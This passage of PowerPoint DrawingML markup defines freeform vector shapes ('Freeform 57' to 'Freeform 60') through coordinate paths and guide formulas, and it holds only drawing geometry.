                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="268"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="284" y="305"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="284" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="326"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="468"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="447"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="394"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="284" y="305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50" name="Freeform 57"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6108700" y="5975350"/>
                <a:ext cx="165100" cy="263525"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 458"/>
                  <a:gd name="T1" fmla="*/ 0 h 731"/>
                  <a:gd name="T2" fmla="*/ 457 w 458"/>
                  <a:gd name="T3" fmla="*/ 661 h 731"/>
                  <a:gd name="T4" fmla="*/ 331 w 458"/>
                  <a:gd name="T5" fmla="*/ 730 h 731"/>
                  <a:gd name="T6" fmla="*/ 0 w 458"/>
                  <a:gd name="T7" fmla="*/ 62 h 731"/>
                  <a:gd name="T8" fmla="*/ 127 w 458"/>
                  <a:gd name="T9" fmla="*/ 0 h 7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8" h="731">
                    <a:moveTo>
                      <a:pt x="127" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="457" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="730"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127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51" name="Freeform 58"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6202363" y="5897563"/>
                <a:ext cx="287337" cy="282575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 126 w 799"/>
                  <a:gd name="T1" fmla="*/ 288 h 783"/>
                  <a:gd name="T2" fmla="*/ 383 w 799"/>
                  <a:gd name="T3" fmla="*/ 598 h 783"/>
                  <a:gd name="T4" fmla="*/ 383 w 799"/>
                  <a:gd name="T5" fmla="*/ 598 h 783"/>
                  <a:gd name="T6" fmla="*/ 241 w 799"/>
                  <a:gd name="T7" fmla="*/ 220 h 783"/>
                  <a:gd name="T8" fmla="*/ 378 w 799"/>
                  <a:gd name="T9" fmla="*/ 141 h 783"/>
                  <a:gd name="T10" fmla="*/ 640 w 799"/>
                  <a:gd name="T11" fmla="*/ 446 h 783"/>
                  <a:gd name="T12" fmla="*/ 646 w 799"/>
                  <a:gd name="T13" fmla="*/ 446 h 783"/>
                  <a:gd name="T14" fmla="*/ 504 w 799"/>
                  <a:gd name="T15" fmla="*/ 68 h 783"/>
                  <a:gd name="T16" fmla="*/ 619 w 799"/>
                  <a:gd name="T17" fmla="*/ 0 h 783"/>
                  <a:gd name="T18" fmla="*/ 798 w 799"/>
                  <a:gd name="T19" fmla="*/ 541 h 783"/>
                  <a:gd name="T20" fmla="*/ 656 w 799"/>
                  <a:gd name="T21" fmla="*/ 624 h 783"/>
                  <a:gd name="T22" fmla="*/ 394 w 799"/>
                  <a:gd name="T23" fmla="*/ 320 h 783"/>
                  <a:gd name="T24" fmla="*/ 388 w 799"/>
                  <a:gd name="T25" fmla="*/ 320 h 783"/>
                  <a:gd name="T26" fmla="*/ 530 w 799"/>
                  <a:gd name="T27" fmla="*/ 698 h 783"/>
                  <a:gd name="T28" fmla="*/ 388 w 799"/>
                  <a:gd name="T29" fmla="*/ 782 h 783"/>
                  <a:gd name="T30" fmla="*/ 0 w 799"/>
                  <a:gd name="T31" fmla="*/ 362 h 783"/>
                  <a:gd name="T32" fmla="*/ 126 w 799"/>
                  <a:gd name="T33" fmla="*/ 288 h 7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99" h="783">
                    <a:moveTo>
                      <a:pt x="126" y="288"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="383" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="141"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="646" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="656" y="624"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="530" y="698"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="782"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="288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52" name="Freeform 59"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6457950" y="5819775"/>
                <a:ext cx="219075" cy="220663"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 37 w 609"/>
                  <a:gd name="T1" fmla="*/ 310 h 611"/>
                  <a:gd name="T2" fmla="*/ 5 w 609"/>
                  <a:gd name="T3" fmla="*/ 236 h 611"/>
                  <a:gd name="T4" fmla="*/ 0 w 609"/>
                  <a:gd name="T5" fmla="*/ 199 h 611"/>
                  <a:gd name="T6" fmla="*/ 10 w 609"/>
                  <a:gd name="T7" fmla="*/ 169 h 611"/>
                  <a:gd name="T8" fmla="*/ 41 w 609"/>
                  <a:gd name="T9" fmla="*/ 110 h 611"/>
                  <a:gd name="T10" fmla="*/ 67 w 609"/>
                  <a:gd name="T11" fmla="*/ 84 h 611"/>
                  <a:gd name="T12" fmla="*/ 99 w 609"/>
                  <a:gd name="T13" fmla="*/ 58 h 611"/>
                  <a:gd name="T14" fmla="*/ 194 w 609"/>
                  <a:gd name="T15" fmla="*/ 5 h 611"/>
                  <a:gd name="T16" fmla="*/ 231 w 609"/>
                  <a:gd name="T17" fmla="*/ 0 h 611"/>
                  <a:gd name="T18" fmla="*/ 262 w 609"/>
                  <a:gd name="T19" fmla="*/ 0 h 611"/>
                  <a:gd name="T20" fmla="*/ 320 w 609"/>
                  <a:gd name="T21" fmla="*/ 26 h 611"/>
                  <a:gd name="T22" fmla="*/ 341 w 609"/>
                  <a:gd name="T23" fmla="*/ 52 h 611"/>
                  <a:gd name="T24" fmla="*/ 535 w 609"/>
                  <a:gd name="T25" fmla="*/ 320 h 611"/>
                  <a:gd name="T26" fmla="*/ 572 w 609"/>
                  <a:gd name="T27" fmla="*/ 368 h 611"/>
                  <a:gd name="T28" fmla="*/ 608 w 609"/>
                  <a:gd name="T29" fmla="*/ 399 h 611"/>
                  <a:gd name="T30" fmla="*/ 498 w 609"/>
                  <a:gd name="T31" fmla="*/ 478 h 611"/>
                  <a:gd name="T32" fmla="*/ 472 w 609"/>
                  <a:gd name="T33" fmla="*/ 463 h 611"/>
                  <a:gd name="T34" fmla="*/ 446 w 609"/>
                  <a:gd name="T35" fmla="*/ 441 h 611"/>
                  <a:gd name="T36" fmla="*/ 446 w 609"/>
                  <a:gd name="T37" fmla="*/ 489 h 611"/>
                  <a:gd name="T38" fmla="*/ 435 w 609"/>
                  <a:gd name="T39" fmla="*/ 520 h 611"/>
                  <a:gd name="T40" fmla="*/ 409 w 609"/>
                  <a:gd name="T41" fmla="*/ 552 h 611"/>
                  <a:gd name="T42" fmla="*/ 372 w 609"/>
                  <a:gd name="T43" fmla="*/ 583 h 611"/>
                  <a:gd name="T44" fmla="*/ 314 w 609"/>
                  <a:gd name="T45" fmla="*/ 610 h 611"/>
                  <a:gd name="T46" fmla="*/ 283 w 609"/>
                  <a:gd name="T47" fmla="*/ 610 h 611"/>
                  <a:gd name="T48" fmla="*/ 257 w 609"/>
                  <a:gd name="T49" fmla="*/ 604 h 611"/>
                  <a:gd name="T50" fmla="*/ 210 w 609"/>
                  <a:gd name="T51" fmla="*/ 573 h 611"/>
                  <a:gd name="T52" fmla="*/ 188 w 609"/>
                  <a:gd name="T53" fmla="*/ 552 h 611"/>
                  <a:gd name="T54" fmla="*/ 173 w 609"/>
                  <a:gd name="T55" fmla="*/ 530 h 611"/>
                  <a:gd name="T56" fmla="*/ 141 w 609"/>
                  <a:gd name="T57" fmla="*/ 473 h 611"/>
                  <a:gd name="T58" fmla="*/ 131 w 609"/>
                  <a:gd name="T59" fmla="*/ 441 h 611"/>
                  <a:gd name="T60" fmla="*/ 131 w 609"/>
                  <a:gd name="T61" fmla="*/ 415 h 611"/>
                  <a:gd name="T62" fmla="*/ 147 w 609"/>
                  <a:gd name="T63" fmla="*/ 363 h 611"/>
                  <a:gd name="T64" fmla="*/ 162 w 609"/>
                  <a:gd name="T65" fmla="*/ 336 h 611"/>
                  <a:gd name="T66" fmla="*/ 241 w 609"/>
                  <a:gd name="T67" fmla="*/ 242 h 611"/>
                  <a:gd name="T68" fmla="*/ 257 w 609"/>
                  <a:gd name="T69" fmla="*/ 216 h 611"/>
                  <a:gd name="T70" fmla="*/ 262 w 609"/>
                  <a:gd name="T71" fmla="*/ 199 h 611"/>
                  <a:gd name="T72" fmla="*/ 246 w 609"/>
                  <a:gd name="T73" fmla="*/ 158 h 611"/>
                  <a:gd name="T74" fmla="*/ 231 w 609"/>
                  <a:gd name="T75" fmla="*/ 132 h 611"/>
                  <a:gd name="T76" fmla="*/ 210 w 609"/>
                  <a:gd name="T77" fmla="*/ 121 h 611"/>
                  <a:gd name="T78" fmla="*/ 184 w 609"/>
                  <a:gd name="T79" fmla="*/ 121 h 611"/>
                  <a:gd name="T80" fmla="*/ 157 w 609"/>
                  <a:gd name="T81" fmla="*/ 137 h 611"/>
                  <a:gd name="T82" fmla="*/ 126 w 609"/>
                  <a:gd name="T83" fmla="*/ 169 h 611"/>
                  <a:gd name="T84" fmla="*/ 126 w 609"/>
                  <a:gd name="T85" fmla="*/ 184 h 611"/>
                  <a:gd name="T86" fmla="*/ 141 w 609"/>
                  <a:gd name="T87" fmla="*/ 236 h 611"/>
                  <a:gd name="T88" fmla="*/ 47 w 609"/>
                  <a:gd name="T89" fmla="*/ 320 h 611"/>
                  <a:gd name="T90" fmla="*/ 309 w 609"/>
                  <a:gd name="T91" fmla="*/ 294 h 611"/>
                  <a:gd name="T92" fmla="*/ 288 w 609"/>
                  <a:gd name="T93" fmla="*/ 320 h 611"/>
                  <a:gd name="T94" fmla="*/ 267 w 609"/>
                  <a:gd name="T95" fmla="*/ 352 h 611"/>
                  <a:gd name="T96" fmla="*/ 257 w 609"/>
                  <a:gd name="T97" fmla="*/ 378 h 611"/>
                  <a:gd name="T98" fmla="*/ 273 w 609"/>
                  <a:gd name="T99" fmla="*/ 441 h 611"/>
                  <a:gd name="T100" fmla="*/ 294 w 609"/>
                  <a:gd name="T101" fmla="*/ 463 h 611"/>
                  <a:gd name="T102" fmla="*/ 314 w 609"/>
                  <a:gd name="T103" fmla="*/ 478 h 611"/>
                  <a:gd name="T104" fmla="*/ 341 w 609"/>
                  <a:gd name="T105" fmla="*/ 483 h 611"/>
                  <a:gd name="T106" fmla="*/ 362 w 609"/>
                  <a:gd name="T107" fmla="*/ 473 h 611"/>
                  <a:gd name="T108" fmla="*/ 388 w 609"/>
                  <a:gd name="T109" fmla="*/ 452 h 611"/>
                  <a:gd name="T110" fmla="*/ 398 w 609"/>
                  <a:gd name="T111" fmla="*/ 420 h 611"/>
                  <a:gd name="T112" fmla="*/ 404 w 609"/>
                  <a:gd name="T113" fmla="*/ 405 h 611"/>
                  <a:gd name="T114" fmla="*/ 404 w 609"/>
                  <a:gd name="T115" fmla="*/ 389 h 611"/>
                  <a:gd name="T116" fmla="*/ 388 w 609"/>
                  <a:gd name="T117" fmla="*/ 352 h 611"/>
                  <a:gd name="T118" fmla="*/ 320 w 609"/>
                  <a:gd name="T119" fmla="*/ 258 h 6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09" h="611">
                    <a:moveTo>
                      <a:pt x="37" y="310"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="37" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="535" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="572" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="608" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="498" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="472" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="451" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="435" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="610"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="573"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="552"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="305"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="241" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="179"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="246" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="132"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="194" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="169"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="310"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="309" y="294"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="309" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="267" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="378"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="463"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="314" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="330" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="341" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="473"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="420"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="389"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="388" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="309" y="294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53" name="Freeform 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6584950" y="5710238"/>
                <a:ext cx="166688" cy="227012"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 105 w 463"/>
                  <a:gd name="T1" fmla="*/ 110 h 631"/>
                  <a:gd name="T2" fmla="*/ 153 w 463"/>
                  <a:gd name="T3" fmla="*/ 168 h 631"/>
                  <a:gd name="T4" fmla="*/ 158 w 463"/>
                  <a:gd name="T5" fmla="*/ 168 h 631"/>
                  <a:gd name="T6" fmla="*/ 158 w 463"/>
                  <a:gd name="T7" fmla="*/ 168 h 631"/>
                  <a:gd name="T8" fmla="*/ 153 w 463"/>
                  <a:gd name="T9" fmla="*/ 120 h 631"/>
                  <a:gd name="T10" fmla="*/ 158 w 463"/>
                  <a:gd name="T11" fmla="*/ 84 h 631"/>
                  <a:gd name="T12" fmla="*/ 158 w 463"/>
                  <a:gd name="T13" fmla="*/ 84 h 631"/>
                  <a:gd name="T14" fmla="*/ 163 w 463"/>
                  <a:gd name="T15" fmla="*/ 62 h 631"/>
                  <a:gd name="T16" fmla="*/ 174 w 463"/>
                  <a:gd name="T17" fmla="*/ 47 h 631"/>
                  <a:gd name="T18" fmla="*/ 184 w 463"/>
                  <a:gd name="T19" fmla="*/ 32 h 631"/>
                  <a:gd name="T20" fmla="*/ 200 w 463"/>
                  <a:gd name="T21" fmla="*/ 15 h 631"/>
                  <a:gd name="T22" fmla="*/ 200 w 463"/>
                  <a:gd name="T23" fmla="*/ 15 h 631"/>
                  <a:gd name="T24" fmla="*/ 210 w 463"/>
                  <a:gd name="T25" fmla="*/ 10 h 631"/>
                  <a:gd name="T26" fmla="*/ 210 w 463"/>
                  <a:gd name="T27" fmla="*/ 10 h 631"/>
                  <a:gd name="T28" fmla="*/ 221 w 463"/>
                  <a:gd name="T29" fmla="*/ 0 h 631"/>
                  <a:gd name="T30" fmla="*/ 310 w 463"/>
                  <a:gd name="T31" fmla="*/ 110 h 631"/>
                  <a:gd name="T32" fmla="*/ 310 w 463"/>
                  <a:gd name="T33" fmla="*/ 110 h 631"/>
                  <a:gd name="T34" fmla="*/ 289 w 463"/>
                  <a:gd name="T35" fmla="*/ 120 h 631"/>
                  <a:gd name="T36" fmla="*/ 289 w 463"/>
                  <a:gd name="T37" fmla="*/ 120 h 631"/>
                  <a:gd name="T38" fmla="*/ 273 w 463"/>
                  <a:gd name="T39" fmla="*/ 136 h 631"/>
                  <a:gd name="T40" fmla="*/ 273 w 463"/>
                  <a:gd name="T41" fmla="*/ 136 h 631"/>
                  <a:gd name="T42" fmla="*/ 247 w 463"/>
                  <a:gd name="T43" fmla="*/ 162 h 631"/>
